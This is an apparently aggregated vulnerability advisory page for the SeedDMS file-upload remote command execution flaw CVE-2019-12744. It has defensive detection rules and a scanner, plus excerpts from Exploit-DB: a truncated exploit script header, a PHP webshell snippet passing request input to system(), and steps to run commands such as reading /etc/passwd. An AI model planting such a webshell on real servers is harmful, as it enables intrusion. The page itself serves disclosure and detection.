CVE-2019-12744

Published 2019-06-20

SeedDMS before 5.1.11 allows Remote Command Execution (RCE) because of unvalidated file upload of PHP scripts, a different vulnerability than CVE-2018-12940.

| Priority | CVSS 3.0 | Severity | Vector |
|---|---|---|---|
| P2 (61) | 7.5 | high | AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H |

Exploit: public exploit available. EPSS: 11.70% (95.5th percentile).
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| seeddms | seeddms | < 5.1.11 | 5.1.11 |
Detection & IOCs (extracted from sources)

Detection:
- Alert on HTTP GET or POST requests to the path pattern /data/1048576/<numeric_id>/1.php, which is the fixed storage path where SeedDMS saves uploaded document versions and where the webshell is accessed.
- Detect upload of files with a .php extension to /op/op.AddDocument.php; legitimate document uploads should not include PHP scripts.
- Monitor for the presence of the session cookie 'mydms_session' combined with POST requests to document upload endpoints as an indicator of authenticated exploitation attempts.
- Detect PHP webshell content using the pattern $_REQUEST['cmd'] with a system() call written to files under /data/1048576/.

Caveats:
- The document storage path /data/1048576/ is described as a default; installations may use a different base data directory, so detection rules should account for configurable paths.
- Exploitation requires valid authenticated credentials; unauthenticated access to upload endpoints will fail, so brute-force or credential-stuffing against /op/op.Login.php may precede the RCE.
- The uploaded PHP webshell filename is randomly generated (20 lowercase characters) with a .php extension, making static filename-based detection insufficient; the path pattern /data/1048576/<docID>/1.php is more reliable because the version file is always named 1.php.
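The detection items above, turned into a small scanner over request events; this is an added example, not code from the page's sources or from the SeedDMS project. The event shape (a dict with method, path, client IP and the multipart Content-Disposition headers of the body), the `data_dirs` parameter that covers the configurable storage directory, the `Finding` class and the list of PHP-executable extensions beyond plain `.php` are assumptions made here. It also includes a content check for the `$_REQUEST['cmd']` plus `system()` pattern named in the fourth item, generalised to the other request superglobals and command-execution functions.

```python
import re
from dataclasses import dataclass

# Constructed sample traffic modelled on the IOC list above (not real captures).
# One client uploads a PHP file and then requests the stored version file with a
# cmd parameter; a second client uploads an ordinary PDF.
SAMPLE_EVENTS = [
    {"ip": "203.0.113.7", "method": "POST", "path": "/op/op.Login.php",
     "status": 302, "body": ""},
    {"ip": "203.0.113.7", "method": "POST", "path": "/op/op.AddDocument.php",
     "status": 302,
     "body": 'Content-Disposition: form-data; name="userfile[]"; '
             'filename="qwertyuiopasdfghjklz.php"'},
    {"ip": "203.0.113.7", "method": "GET", "path": "/data/1048576/42/1.php?cmd=id",
     "status": 200, "body": ""},
    {"ip": "198.51.100.20", "method": "POST", "path": "/op/op.AddDocument.php",
     "status": 302,
     "body": 'Content-Disposition: form-data; name="userfile[]"; '
             'filename="quarterly-report.pdf"'},
    {"ip": "198.51.100.20", "method": "GET",
     "path": "/op/op.Download.php?documentid=43&version=1", "status": 200, "body": ""},
]

# Extensions a typical PHP handler executes; the page only names .php.
PHP_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")
UPLOAD_ENDPOINT = "/op/op.AddDocument.php"
FILENAME_RE = re.compile(r'filename="([^"]*)"', re.IGNORECASE)
# Request input reaching a command-execution function (the webshell pattern).
SHELL_INPUT_RE = re.compile(r"\$_(?:REQUEST|GET|POST)\s*\[")
SHELL_EXEC_RE = re.compile(r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(")


@dataclass
class Finding:
    rule: str
    ip: str
    detail: str


def version_file_pattern(data_dirs=("data",)):
    """Build the /<data_dir>/<folder>/<docID>/1.php matcher.

    The data directory is configurable, so callers pass the ones they use;
    the numeric folder (1048576 in the default layout) is matched generically.
    """
    alts = "|".join(re.escape(d.strip("/")) for d in data_dirs)
    return re.compile(rf"^/(?:{alts})/\d+/\d+/1\.php(?:[?#]|$)")


def uploaded_php_names(body):
    """Return uploaded filenames from multipart headers that carry a PHP extension."""
    return [n for n in FILENAME_RE.findall(body) if n.lower().endswith(PHP_EXTENSIONS)]


def webshell_indicators(php_source):
    """True when a file both reads request input and calls a command-execution function."""
    return bool(SHELL_INPUT_RE.search(php_source) and SHELL_EXEC_RE.search(php_source))


def scan(events, data_dirs=("data",)):
    """Apply the upload and version-file rules to a list of request events."""
    version_file = version_file_pattern(data_dirs)
    findings = []
    for e in events:
        path = e["path"]
        if e["method"] == "POST" and path.split("?")[0] == UPLOAD_ENDPOINT:
            for name in uploaded_php_names(e.get("body", "")):
                findings.append(Finding("php-upload", e["ip"], name))
        if version_file.match(path):
            findings.append(Finding("version-file-request", e["ip"], path))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:22} {f.ip:15} {f.detail}")
```

Run on the constructed events it reports the PHP upload and the follow-up request to `/data/1048576/42/1.php`, and nothing for the PDF upload or the normal download. `webshell_indicators` is meant to run over the contents of files under the data directory; pairing the two request rules with it lets a responder confirm a hit without relying on the random 20-character upload name.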
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.0 | MEDIUM | AV:N/AC:M/Au:S/C:P/I:P/A:P |
No detection rules found.
Exploit-DB

Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)
exploitdb · 2021-06-25 · CVSS 7.5 · CVE-2019-12744 [HIGH]
---
```python
# Exploit Title: Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)
# Date: 25/06/2021
# Exploit Author: Bryan Leong
# Vendor Homepage: https://www.seeddms.org/index.php?id=2
# Software Link: https://sourceforge.net/projects/seeddms/files/seeddms-5.0.11/
# Version: Seeddms 5.1.10
# Tested on: Windows 7 x64
# CVE: CVE-2019-12744
import requests
import argparse
import sys
import random
import string
from bs4 import BeautifulSoup
from requests_toolbelt import MultipartEncoder

def sysArgument():
    ap = argparse.ArgumentParser()
    ap.add_argument("-u", "--username", required=True, help="login username")
    ap.add_argument("-p", "--password", required=True, help="login password")
    ap.add_argument("--url", required=True
```
Exploit-DB

SeedDMS versions < 5.1.11 - Remote Command Execution
exploitdb · 2019-06-24 · CVSS 7.5 · CVE-2019-12744 [HIGH]

```php
";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "";
die;
}
?>
```
Step 3: After uploading the file, check the document id corresponding to the document.
Step 4: Go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in the browser.
Note: Here "data" and "1048576" are the default folders where the uploaded files are saved.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/153383/SeedDMS-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/163283/Seeddms-5.1.10-Remote-Command-Execution.html
- https://secfolks.blogspot.com/2019/06/exploit-for-cve-2019-12744-remote.html
- https://sourceforge.net/p/seeddms/code/ci/master/tree/CHANGELOG